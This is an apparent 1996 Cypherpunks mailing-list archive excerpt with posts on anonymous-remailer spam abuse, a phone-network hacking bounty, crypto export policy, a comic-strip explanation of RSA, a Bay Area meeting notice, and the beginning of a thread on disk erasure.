We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: HipCrime <robert@precipice.v-site.net>
Date: Thu, 12 Sep 1996 13:26:29 +0800
To: cypherpunks@toad.com
Subject: [Fwd: Nonsense, absolute nonsense... [Fwd: HipCrime and Spam]]
Message-ID: <32377788.758E@precipice.v-site.net>
MIME-Version: 1.0
Content-Type: text/plain

-- 
Security is mostly a superstition. It does not exist in nature, 
nor do the children of men as a whole experience it.  Avoiding 
danger is no safer in the long run than outright exposure. 
Life is either a daring adventure, or nothing. -- Hellen Keller


To: cypherpunks@toad.com
Subject: Nonsense, absolute nonsense... [Fwd: HipCrime and Spam]
From: Admin <admin@superhot.com>
Date: Wed, 11 Sep 1996 15:20:35 -0600
Cc: remailer-operators@c2.org
Sender: owner-cypherpunks@toad.com



>This is an absurd and inaccurate analogy. The mailBot simply pushes
>*mailto:* tags that people have willingly placed on their public websites.
>They invite the mail so a more accurate analogy would be that City Hall puts
>up a public suggestion box and invites comments. The bot then puts one, and
>only one, unsigned anonymous suggestion into the box. It then goes on to the
>Art Gallery where they too have put up a public suggestion box, and the bot
>places one, and only one, anonymous suggestion in that box also...and it
>moves on to the next publicly accessable suggestion box that it finds, each
>time putting in one, and only one, message.
>
>Can the College-aged mind these days not develop a rational, concise,
>accurate and logical analogy that stays on point?
>
>Think about it... or take down the public suggestion boxes if one doesn't
>like what one finds inside. If you invite feedback...it will come.
>
>admin
>
>
>There is
>>
>>HipCrime <na673130@anon.penet.fi> wrote:
>>> Be honest, all you really care about is something which
>>> "threatens the existence" your little baby.
>>
>>I think you were referring to yourself, Robert.  :)
>>
>>
>>Since you don't seem to understand the concept of spam very well yet,
>>try this little experiment:
>>
>>Go downtown to City Hall and post advertisements for your website on
>>all the walls and doors.  Be sure to put one on the Mayor's office and
>>all the members of the City Council.  If they complain, explain to them
>>why they are weak-minded souls who can't remove unwanted messages.
>>
>>Go to the local art gallery and post your signs all over.  Tell people
>>that since your web site is an "art project", that you are posting EXACTLY
>>on topic, to an "appropriate group".  Ask, "So, what's your problem ?!?"
>>
>>Pass out survey forms.  Ask people where they want to see advertisements.
>>Go to these sites and spray-paint your http address.  If people complain
>>that you are "harassing" them, ask them why a whopping eighteen letters
>>written on the wall is harassment.  Tell them it's not *your* fault,
>>that you're just doing what other people told you to.  Explain how many
>>trees you are saving by using spray-paint instead of paper.
>>
>>When the police handcuff you and take you away, complain that they are
>>censoring you.  Tell the judge that you want to sue the cops for violating
>>your civil rights.  While you're in jail, think about why what you did
>>was wrong.
<>________________Lowest_Priced_Long_Distance__________________<>
||Long Distance 9.9¢/min           |Helping hardworking people ||
||9.9¢ Anytime, Anywhere in US!    |like yourself pay the      ||
||Free sign-up, 6 second billing   |lowest possible price for  ||
||http://www.superhot.com/phone    |high quality LD service.   ||
<>-----------------------1_303_692_5190------------------------<>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ross Wright" <rwright@adnetsol.com>
Date: Thu, 12 Sep 1996 13:22:05 +0800
To: andy@CCMSD.chem.uga.edu>
Subject: Re: Nonsense, absolute nonsense... [Fwd: HipCrime and Spam]
Message-ID: <199609120245.TAA28195@adnetsol.adnetsol.com>
MIME-Version: 1.0
Content-Type: text/plain


Sirs:

I must agree that having a website invites unsolicited  e-mail, if 
only to comment that people have seen the site.  I send unsolicited 
e-mail to website owners as part of my marketing plan.

On Or About: 11 Sep 96 at 21:34, Andy Dustman wrote:

> You're sending out messages, inviting people to visit your web site, but
> you're using anonymous remailers because... you don't want people to know
> who you are? Then why invite them to your site (or even have a site)?

That's what makes it smell fishy.  When I send  unsolicited  e-mail I 
give up the whole deal: phone number and all.  If someone complains, 
I make great effort to never contact that person again.  Either you 
want people to know who you are or you don't. 

> Which is precisely what you're doing: Sending someone e-mail
> costs them time and it often costs them money.

As I said having a website invites comments.  It's like being a 
public figure.  In effect you are publishing your e-mail address.

> 4) It's giving us a bad
> rap, man, and that's the *last* thing the remailer net needs now.
> The remailers of the world don't exist
> to provide non-anonymous anonymous advertising, which you could do just as
> well on your own sending forged e-mail headers from netcom.

Just like all the seedy low life multi-level-marketing jerks!  No 
need to use a remailer for that.

Just 2 cents worth.

Ross

===========
Ross Wright
King Media: Bulk Sales of Software Media and Duplication Services
http://www.slip.net/~cdr/kingmedia
Voice: 415-206-9906




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: =?ISO-8859-1?Q?J=FCri_Kaljundi?= <jk@stallion.ee>
Date: Thu, 12 Sep 1996 04:45:31 +0800
To: "Mark O. Aldrich" <maldrich@grci.com>
Subject: Re: Hacking Mobil Telephone System ?
In-Reply-To: <Pine.SCO.3.93.960911111553.16740A-100000@grctechs.va.grci.com>
Message-ID: <Pine.GSO.3.93.960911200728.11985B-100000@nebula>
MIME-Version: 1.0
Content-Type: text/plain


 Wed, 11 Sep 1996, Mark O. Aldrich wrote:

> On Wed, 11 Sep 1996, Stephan Schmidt wrote:
> 
> > the company will pay 100.000 DM (~65.000$) to a non
> 
> OK to phreak your phones - honest," I'd also expect to get paid a hell of
> a lot more than $65 for doing a penetration test on their network.  Sixty
> five bucks won't even pay the per diem, none the less a reasonable wage.

Actually 65.000$ is pronounced sixty five thousand dollars not sixty five
dollars, at least in Eastern and Central Europe. 

Jüri Kaljundi
AS Stallion
jk@stallion.ee





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adamsc@io-online.com (Adamsc)
Date: Thu, 12 Sep 1996 14:28:50 +0800
To: "JESMTPi Kaljundi" <maldrich@grci.com>
Subject: Re: Hacking Mobil Telephone System ?
Message-ID: <19960912040558171.AAA89@IO-ONLINE.COM>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 11 Sep 1996 18:56:10 -0400 (EDT), Mark O. Aldrich wrote:

>After having traveled in Europe, I was certainly familiar with the
>difference in the notation.  You also think, however, that I would have
>paid more attention to what the hell I was reading before I shot off my
>mouth (via my keyboard), but I didn't.  I think this is called a "brain
>fart" (note to our European brothers and sisters - over there, I think you
>call it a "mental fugue" or "Parliamentary election," I'm nor sure which).

I've always wondered if the makers of mailer software couldn't include a delay
option, so that, say, a message might be held for 10 minutes and then sent. 
Imagine how many of the "Sorry about x; I meant y" posts we'd never see.

# Chris Adams <adamsc@io-online.com> | http://www.io-online.com/adamsc/adamsc.htp
# cadams@acucobol.com | V.M. (619)515-4894
"I have never been able to figure out why anyone would want to play games on
a computer in any case when the whole system is a game.  Word processing,
spreadsheets, telecoms -- it's all a game.  And they pay you to play it."
	-- Duncan Frissell






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@eff.org>
Date: Thu, 12 Sep 1996 13:58:37 +0800
To: cypherpunks@toad.com
Subject: What is best policy paper on crypto?
Message-ID: <Pine.SUN.3.91.960911201759.26035J-100000@eff.org>
MIME-Version: 1.0
Content-Type: text/plain


I happen to know that an influential Congresspern will be meeting with
some Cato folks tomorrow morning, so I'm assuming this isn't an idle 
request. 

-Declan


// declan@eff.org // I do not represent the EFF // declan@well.com //


---------- Forwarded message ----------
Date: Wed, 11 Sep 1996 16:46:09 -0400
From: Solveig Bernstein <sberns@cato.org>
To: fight-censorship@vorlon.mit.edu
Subject: What is best policy paper on crypto?

If you folks were to pick one policy paper or book or magazine article that
did the best job of explaining why export controls on crypto were bad,
and/or why key escrow is not a good idea, which one would you pick?  I'm
looking for something that would be helpful to a Congressperson.

Please feel free to e-mail suggestions to me privately so as not to clutter
up the list. 




**********************************************************************
Solveig Bernstein, Esq.
(202) 789-5274
(202) 842-3490 (fax)

Assistant Director of Telecommunications & Technology Studies
Cato Institute
1000 Mass. Ave. NW
Washington, DC 20001





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: drose@AZStarNet.com (David M. Rose)
Date: Thu, 12 Sep 1996 14:14:34 +0800
To: cypherpunks@toad.com
Subject: That Evil Internet, Pt. XXIII
Message-ID: <199609120410.VAA11385@web.azstarnet.com>
MIME-Version: 1.0
Content-Type: text/plain


Caught an interesting segment on this evening's PBS news program with Jim
Lehrer.

Two senators were discussing whether the U.S. should sign the international
agreement banning chemical warfare.

Sen. Kyl maintains that verification is impossible and that Iraq, Libya, and
North Korea will never participate.

Sen. Nunn responds that we should sign anyway.  Besides, he adds in the non
sequitur of the week, anyone can get instructions on how to build chemical
weapons on the Internet.

I guess the Internet isn't just for pornography and conventional bomb-making
advice anymore.

Dave Rose





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: scrappo.reverb@juno.com (A L)
Date: Thu, 12 Sep 1996 18:02:41 +0800
To: cypherpunks@toad.com
Subject: An old _Discover_ article explaining RSA
Message-ID: <19960911.212157.4415.0.scrappo.reverb@juno.com>
MIME-Version: 1.0
Content-Type: text/plain


I had found this article in an issue of Discover I've had for a few
years. It is a comic strip-type article by Larry Gonick article
explaining,
in Layman's terms, the very basics of RSA. This article was
printed in the April 1992 issue of Discover magazine (some liberties
taken regarding pictures, etc.).

Box1:Prime Time
	featuring SEYMOUR Cloak-and-Dagger Mathematician!
	(sh!)
Box2:PRIME NUMBERS-numbers that can't be
	broken into a product of smaller factors-
	have always been one of the most amusing
	and USELESS topics in mathematics.
Box3:Then why are Banks, Businesses, Mathematicians, and Government
	SPY AGENCIES fighting over prime numbers?
	(STOP RIGHT THERE!)
Box4:It has to do with CRYPTOGRAPHY-secret codes.
	(The patriotic thing to do would be NOT to read one more word!)
Box5:In the computer age, cryptography is MATHEMATICAL: Inside the
	computer, every MESSAGE is a string of ONES and
	ZEROES: a number, in other words.
	(PLEASE!!!)
Box6:ENCRYPTING a message means scrambling this number,
	using a reversible formula based on a secret number
	or numbers called the KEY.
	message-->key-->cyphertext
	DECRYPTING the cyphertext is done by applying the
	key in reverse.
Box7:It would seem that both the sender and receiver need to know-
	and conceal-the key, but in the 1970's, WHITFIELD DIFFIE
	and MARTIN HELLMAN showed a way to MAKE KEYS PUBLIC!
	(Hippy-Diffie!)
Box8:Knowing how to SCRAMBLE, said Diffie, is not the same as
	knowing how to UNSCRAMBLE. Consider the egg!!!
Box9:Suppose a code had TWO KEYS, a scrambler and an UNSCRAMBLER...
	and suppose it was IMPOSSIBLE to compute one key from
	the other-in the sense that no computer could do it in less
	than the lifetime of the UNIVERSE???
	(crank crank crank)
Box10:You'd have an UNBREAKABLE CODE!
	(Wait... Almost got it...)
Box11:It works like this:
	Everyone owns a unique pair of keys. One remains private.
	But the other, public key is listed in a directory.
	To send me a message, you look up my public key and use
		it to scramble the message.
	My private key is the only way to unlock the message.
	Result:total secrecy and privacy!!
Box12:Diffie's idea soon became a reality, as three guys at M.I.T.
created
	a public-key algorithm known as RSA, from their initials.
	(picture)Rivest (picture)Shamir (picture)Adleman
Box13:RSA's unbreakability depends on the "impossibility" of FACTORING
	large numbers.
	(15? that's 3 x 5! Easy!)
	(3,447,981,101,346,271,113,552,476,003,201,
	119,181,244,551,900,123,549,822,344,722,436,001? um..)
Box14:It's not hard to find two large PRIME NUMBERS P and Q. But if
	I hand you their PRODUCT, PQ, your supercomputer will
	never find P and Q again.
	(SOB!)
Box15:Under RSA, each user gets a 160 digit number, N, which is the
	product of two large primes, P and Q.
Box16:The number N is made public, while P and Q remain secret. A
	simple formula completes the encryption, which can't be cracked
	without FACTORING!
	(ngh)
Box17:The National Security Agency didn't like this! The spy bureau wants
	the ability to crack any code!
	(Your assignment Seymour: FACTOR FASTER!!)
Box18:But spies aren't the only ones who need cryptography! Anyone who
	transmits ELECTRONIC DATA wants to secure the information's
	integrity.
	(Why? What? This is an OPEN SOCIETY!)
Box19:Unbreakable public-key code would effectively
	Protect money transfers from tampering
	Shield sensitive business data from the competition
	Immunize software against viruses
	(Allow us to gossip securely by E-Mail!)
Box20:So-After years of resisting Public-Key systems, the government
	in 1991 finally endorsed one as a new NATIONAL STANDARD.
	(I WAS WRONG! EMBRACE ME!)
Box21:Unlike RSA, however, the government's DSA (Digital Signature
	Algorithm) depends on a single, government-issue PRIME
	NUMBER.
	(Take a P! Not any P!)
Box22:Within months, mathematicians had shown how this could give
	the government, and the government alone, the ability to
	BREAK the code-and so the argument continues...
	(Trust, Where is the trust??)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Gary Howland <gary@systemics.com>
Date: Thu, 12 Sep 1996 09:08:01 +0800
To: "Mark O. Aldrich" <maldrich@grci.com>
Subject: Re: Hacking Mobil Telephone System ?
In-Reply-To: <Pine.SCO.3.93.960911111553.16740A-100000@grctechs.va.grci.com>
Message-ID: <32371250.3F54BC7E@systemics.com>
MIME-Version: 1.0
Content-Type: text/plain


Mark O. Aldrich wrote:
> 
> While there's dubious wisdom in trying to tell Der Polizei, "I was just
> responding to an authorization that I found on the Internet that says it's
> OK to phreak your phones - honest," I'd also expect to get paid a hell of
> a lot more than $65 for doing a penetration test on their network.  Sixty
> five bucks won't even pay the per diem, none the less a reasonable wage.

These continental europeans tend to type '.' instead of commas, and ','
instead of points when they write numbers.  (They also have funny ones
and sevens, but that's a another story.)

I thought the offer of 100,000 DM very respectable, and a tad unusual
for a [usually conservative] telecoms company.  It sure beats baseball
caps and T-shirts.

> And Der Polizei is *NOT* known for having a sense of humor about anything,
> at any time, with anyone.

I 100% agree ...

> Remember, kids, they may look like shit in
> uniform, but those automatic weapons they carry are real, so's the ammo,
> and they know how to use both of 'em.

... but the semi automatics they carry are not much different to ones US
cops have.
 
> And *I'll* decide if and when I want to give it to charity, just like I do
> with the rest of my salary, thank you....

And *they'll* decide what sort of deal *they* want to offer.  They did
say the money could be donataed to any non-profit organisation, so this
covers a wide range of organisations (your school or university perhaps,
or computer society, or even the Church of Scientology, The Vatican,
Mitre Corp, NFL, etc. etc.).  I wonder if Radikal is a non-profit  :-)


Gary
--
"Of course the US Constitution isn't perfect; but it's a lot better
than what we have now."  -- Unknown.

pub  1024/C001D00D 1996/01/22  Gary Howland <gary@systemics.com>
Key fingerprint =  0C FB 60 61 4D 3B 24 7D  1C 89 1D BE 1F EE 09 06




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: um@c2.net (Ulf Moeller)
Date: Thu, 12 Sep 1996 07:25:51 +0800
To: cypherpunks@toad.com
Subject: Re: papers on anonymous protocols
In-Reply-To: <Pine.SUN.3.95.960909145739.28990B-100000@eskimo.com>
Message-ID: <m0v0uyA-0000AvC@ulf.mali.sub.org>
MIME-Version: 1.0
Content-Type: text/plain


Wei Dai writes:

>   A. Pfitzmann, B. Pfitzmann, M. Waidner: ISDN-MIXes - Untraceable
>   Communication with Very Small Bandwidth Overhead; Proc. Kommunikation
>   in verteilten Systemen, Feb. 1991, Mannheim, Informatik-Fachberichte
>   267, Springer-Verlag, Heidelberg 1991, 451-463.
>
>describes a protocol for anonymous telephone calls.

The paper is at http://www.informatik.uni-hildesheim.de/FB4/Institute/Informatik/issi/sirene/publ/PfPW_91TelMixeGI_NTG.ps.gz




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andy Dustman <andy@CCMSD.chem.uga.edu>
Date: Thu, 12 Sep 1996 12:11:24 +0800
To: na673130@anon.penet.fi
Subject: Re: Nonsense, absolute nonsense... [Fwd: HipCrime and Spam]
In-Reply-To: <199609112124.PAA11039@rintintin.Colorado.EDU>
Message-ID: <Pine.LNX.3.94.960911211209.27965M-100000@neptune.chem.uga.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Wed, 11 Sep 1996, Admin wrote:

> >This is an absurd and inaccurate analogy. The mailBot simply pushes
> >*mailto:* tags that people have willingly placed on their public websites.
> >They invite the mail so a more accurate analogy would be that City Hall puts
> >up a public suggestion box and invites comments. The bot then puts one, and
> >only one, unsigned anonymous suggestion into the box. It then goes on to the

You're sending out messages, inviting people to visit your web site, but
you're using anonymous remailers because... you don't want people to know
who you are? Then why invite them to your site (or even have a site)? It's
like if I sent out postcards to people with no return address saying,
"Please stop by 1313 Mockingbird Lane for snacks and refreshments. Signed,
A Friend". (Note, this is not my real address.) Only in this case the
postcards don't have any stamps so the people who receive them have to pay
the postage. Which is precisely what you're doing: Sending someone e-mail
costs them time and it often costs them money. Sending it through an
anonymous remailer accomplishes four things: 1) People can't complain to
you to stop sending them mail. 2) It costs us, the International Secret
Cabal of Anonymous Remailer Operators, time and money for no good reason,
because you are sending anonymous mail and not making yourself anonymous.
3) You're pissing off a bunch of people, and the only ones they can take
their frustrations out on or complain to is us. 4) It's giving us a bad
rap, man, and that's the *last* thing the remailer net needs now.

I could care less about your little applet, or what you have to say; in
the words of Thomas Jefferson, "it neither breaks my leg nor picks my
pocket." Until, that is, you start sending it through my remailer, and
*then* you start picking my pocket. The remailers of the world don't exist
to provide non-anonymous anonymous advertising, which you could do just as
well on your own sending forged e-mail headers from netcom.

Andy Dustman / Computational Center for Molecular Structure and Design / UGA
===== For PGP public key:  finger andy@neptune.chem.uga.edu | pgp -fka =====
Sure, the Telecomm Act will create jobs: 100,000 new thought-cops on the net
http://charon.chem.uga.edu/~andy    mailto:andy@CCMSD.chem.uga.edu    <}+++<


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMjdoky0jMb7JduJJAQGEhAQAt6t18GgMP3v6axTGtNiUHXwNN7UR/V+F
XAZtvTXgg9KFR+ZwnfJz3IMrry0aQCNMC2Ude7mldFyfq8FqVVrA6sE26rwYvWUS
U3C3SCiDXhp3rn9RDfbWV8mZcnC6IRHYz9o5qyuhZTfvGdlZr7/nDTOZZPO7icCN
MiYEGcjJzqY=
=l0Ek
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Thu, 12 Sep 1996 14:59:45 +0800
To: cypherpunks@toad.com
Subject: Re: (Fnord) Edupage, 10 September 1996
Message-ID: <199609120436.VAA06548@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


>------- Forwarded Message Follows -------
>************************************************************
>Edupage, 10 September 1996.  Edupage, a summary of news about information
>technology, is provided three times a week as a service by Educom,
>a Washington, D.C.-based consortium of leading colleges and universities
>seeking to transform education through the use of information technology.
>************************************************************
>
>TOP STORIES
>        Wired World Will "Diminish National Sovereignty"
>[..]
>WIRED WORLD WILL "DIMINISH NATIONAL SOVEREIGNTY"
>A leading Clinton Administration official on information security and
>cryptography matters says that traditional notions of sovereignty, national
>security and warfare will be undermined by the year 2020, when the whole
>world is "wired" and e-cash is the norm.

24 years from now?  He thinks it'll take that long?!?   24 years _ago_  the 
4004 microprocessor barely existed.  And if anything, change is accelerating 
very rapidly.

>The result will be less powerful
>governments in relation to criminal organizations such as the Mafia and
>international drug cartels,

Organizations which exist only because of the existence of government...


>says Michael Nelson, who adds that organized
>crime members are already some of the most sophisticated users of computer
>systems and strong encryption technology.  In addition, computer crackers
>will pose a more significant threat.  In response, Nelson advocates
>resolving the issue of whether unauthorized access of a computer is an "act
>of trespass" or an "act of war," and prosecuting the intrusions accordingly.
>(BNA Daily Report for Executives 6 Sep 96 A14)

I'd sure like to be able to corner this guy and point out that there are 
people who believe that _regulating_ the Internet should either be 
considered an "act of trespass" or an "act of war."  And does he want to be 
punished, or merely stopped?

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Thu, 12 Sep 1996 12:12:46 +0800
To: stewarts@ix.netcom.com
Subject: Unsolicited harrassing e-mail from <stewarts@ix.netcom.com>
In-Reply-To: <199609112356.TAA16511@attrh1.attrh.att.com>
Message-ID: <m1c5TD97w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Please stop e-mailing me, cc:ing me, or otherwise harrassing me.
I have no connection with the thread you're quoting and don't
want to receive any more e-mail from you.

stewarts@ix.netcom.com writes:

> >> There
> >> are a number of anonymous remailers out in cyberspace, but it has been
> >> stated by a knowledgeable source that a number of them are being operated
> >> by law enforcement agencies (presumably to troll for criminal activity). A
> >
> >Can someone verify/discredit/comment on this statement?  Who is the
> >knowledgeable source?
>
> Definitely true.  Zero is a number, and there are also larger numbers.
> KOTM = Kook Of The Month.
>
> #			Thanks;  Bill
> # Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
> # <A HREF="http://idiom.com/~wcs"> 	
> # You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto
>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andy Dustman <andy@CCMSD.chem.uga.edu>
Date: Thu, 12 Sep 1996 13:19:02 +0800
To: remailer-operators@c2.org
Subject: na673130@anon.penet.fi gone [Anonymous service rejected your mail.] (fwd)
Message-ID: <Pine.LNX.3.94.960911214618.27965N-100000@neptune.chem.uga.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Looks like Spambo either deleted his id or Julf pulled the plug on him.

Andy Dustman / Computational Center for Molecular Structure and Design / UGA
===== For PGP public key:  finger andy@neptune.chem.uga.edu | pgp -fka =====
Sure, the Telecomm Act will create jobs: 100,000 new thought-cops on the net
http://charon.chem.uga.edu/~andy    mailto:andy@CCMSD.chem.uga.edu    <}+++<

- ---------- Forwarded message ----------
Date: Thu, 12 Sep 96 04:36:13 +0300
From: daemon@anon.penet.fi
To: andy@ccmsd.chem.uga.edu
Subject: Anonymous service rejected your mail.

You, andy@ccmsd.chem.uga.edu, have requested mail forwarding to
na673130. This was rejected, as the user is unknown.
Either the id has never been allocated, or the id has been removed at the
request of the user.

Contents of message follows: [deleted]



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMjdsIy0jMb7JduJJAQHl1AQAoLN85rIEqLBSKm/0dVjj7eD/aDh6lpKX
B75xki8v20+LFku9ddXy1rb8KEKqnMVy/WSGlB18gNvqFJTbw4obzB4/M+df3JPy
893mVkaJd24d+OZWYwTx1Nc19VIho9WXSC/8ohJhVN+R44R4+yWjHzupCAMxGfiY
wWzgMqQXlwI=
=7KZS
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Thu, 12 Sep 1996 15:01:16 +0800
To: cypherpunks@toad.com
Subject: Bay Area Cypherpunks Meeting Saturday 9/14, 12-6PDT, Stanford
Message-ID: <199609120456.VAA14292@dfw-ix11.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


The monthly Bay Area Cypherpunks Meeting will be held
Saturday, September 14th, at the picnic tables outside Tressider Hall
at Stanford University.  Lunch and general hanging out begin at 12:00, 
Program begins at 1:00.  The coffee shop at Tressider will be open,
though the main cafeteria won't be.  

Some items on the agenda include
        John Gilmore's SWAN project, Encrypting 5% of the net by Christmas
        Highlights of Crypto '96 meeting in Santa Barbara
        Bagels and bagel paraphrenalia
        The remailer crisis - anon.penet.fi, creative new spammer attacks
        Censorship Firewalls for SG, CN, DE, etc. - designing workarounds
        The Bernstein Lawsuit - court date is Friday Sept. 20
        Bring show&tell items.

You can find a map of the Stanford campus on the web at
http://www.stanford.edu/home/visitors/campus-map.html
To confuse Stanford alumni, the map has been realigned with the
North end up, so visitors can use it.  From Campus Drive East,
turn North on Mayfield Ave, turn right on Lagunita Dr, and park in the lot.
Walk north to Tressider, and the tables are on the west=left side.
Look for the crowd of drug smugglers, money launderers, and Suspicious Persons.

#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# <A HREF="http://idiom.com/~wcs"> 	
# You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "!.!..............................#" <saione@primenet.com>
Date: Thu, 12 Sep 1996 15:48:14 +0800
To: <cypherpunks@toad.com>
Subject: RE: robert and hipcirme web sight
Message-ID: <199609120544.WAA11273@primenet.com>
MIME-Version: 1.0
Content-Type: text/plain




>It's obvious that this guy's true passion is fractals and raytracing.  
>He threw in some bomb-making stuff, but he scanned it out of a book and
>probably never tried it.  Compared to the rest of the site, it looks like
>an afterthought.  Someone who was really interested in chemistry would
>have taken the time to retype the info and add their own comments.  He
>had a reason to have some "anarchist" info on there but he's not really
>interested in it.  So basically this guy is a mathematician/artist trying
>to pretend he's an anarchist.


If his true passion is fractals and raytracing, then why would he expend
energy 
things other than fractals and raytracing.  He may be an anarchict but wish
to invest his time 
in fractals and raytracing rather than in explaining anarchy.


>Same goes for the remailers.  He claims he likes remailers and anonymity,
>but he's lying.  Anyone who really liked remailers/anonymity/privacy would
>have pages and pages about how to use remailers, and why privacy is a good
>thing.  He has a reason he needs to be anonymous, but it's not because
>he supports privacy.  He publishes a PGP key, because he wants to pretend
>he's an anarchist, and Louis Freeh told him that all evil terrorist
>organizations use PGP.  But he doesn't like PGP, he doesn't advocate PGP,
>and he doesn't tell you where to get PGP.


If his true passion were re-mailers and anonymity then he would spend pages
and pages writing about them rather than just admitting to supporting them.


.00010000.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Thu, 12 Sep 1996 14:34:59 +0800
To: Stephan Schmidt <schmidt@pin.de>
Subject: Re: Guns Don't Kill People, IP Does
In-Reply-To: <Pine.LNX.3.94.960910084804.8332D-100000@blau.pin.de>
Message-ID: <Pine.LNX.3.93.960911223159.591A-100000@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 10 Sep 1996, Stephan Schmidt wrote:

> > > One thought : How many of you would support terrorist
> > > web server (say Oklahoma, TWA, Iran, Lybia, RAF, IRA, ...) ?
> > > -stephan 
> > Consdering how none of the above incidents are connected in any way 
> > to the internet, what do you mean?  And what if there were bomb making 
> Sorry for my bad English, perhaps I got misunderstood.
> Would you run a WWW site where the (say there where some)
> terrorist who shot down (a wild assumtion too) the TWA plane
> claiming it was right and all people should fight 'evil
> America'. Because of your web site there are other bomb
> attacks in the US (or somewhere else, the country is not that 
> important) (although it's of course impossible to proove that
> this bombings are 'inspired' by your web site).
> Would you support the freedom of speech in this way ?

     If they paid me to host the site, yes. If I agreed with their reasons
or goals, I might even give them a discount. 

Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@smoke.suba.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 12 Sep 1996 15:46:43 +0800
To: cypherpunks@toad.com
Subject: 10 minute delay considered inconsequential
Message-ID: <ae5cf37f0b0210041643@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 4:15 AM 9/12/96, Adamsc wrote:

>I've always wondered if the makers of mailer software couldn't include a delay
>option, so that, say, a message might be held for 10 minutes and then sent.
>Imagine how many of the "Sorry about x; I meant y" posts we'd never see.

I expect there would be little effect. I suspect most of us write articles,
send them out, and only notice the mistakes, typos, whatever when they are
pointed out.

(Very few people reread their posts prior to seeing them on the list an
hour or two later, is my strong hunch. A delay of 10 minutes would not
inspire many to read and reread their posts...most likely they'd just move
on to other articles, other posts, and the 10 minute delay would be utterly
inconsequential.)

--Tim May

We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@flame.alias.net (Anonymous)
Date: Thu, 12 Sep 1996 10:26:42 +0800
To: cypherpunks@toad.com
Subject: HipCrime and Spam
Message-ID: <199609112052.WAA02693@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain


HipCrime <na673130@anon.penet.fi> wrote:
> Be honest, all you really care about is something which
> "threatens the existence" your little baby.

I think you were referring to yourself, Robert.  :)


Since you don't seem to understand the concept of spam very well yet,
try this little experiment:

Go downtown to City Hall and post advertisements for your website on
all the walls and doors.  Be sure to put one on the Mayor's office and
all the members of the City Council.  If they complain, explain to them
why they are weak-minded souls who can't remove unwanted messages.

Go to the local art gallery and post your signs all over.  Tell people
that since your web site is an "art project", that you are posting EXACTLY
on topic, to an "appropriate group".  Ask, "So, what's your problem ?!?"

Pass out survey forms.  Ask people where they want to see advertisements.
Go to these sites and spray-paint your http address.  If people complain
that you are "harassing" them, ask them why a whopping eighteen letters
written on the wall is harassment.  Tell them it's not *your* fault,
that you're just doing what other people told you to.  Explain how many
trees you are saving by using spray-paint instead of paper.

When the police handcuff you and take you away, complain that they are
censoring you.  Tell the judge that you want to sue the cops for violating
your civil rights.  While you're in jail, think about why what you did
was wrong.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Thu, 12 Sep 1996 16:19:23 +0800
To: cypherpunks@toad.com
Subject: Re: Erasing Disks
Message-ID: <199609120609.XAA05442@netcom8.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


I was asked of an outline of Peter Gutmann's paper, "Secure Deletion of
Data from Magnetic and Solid-State Memory" in The Sixth USENIX Security
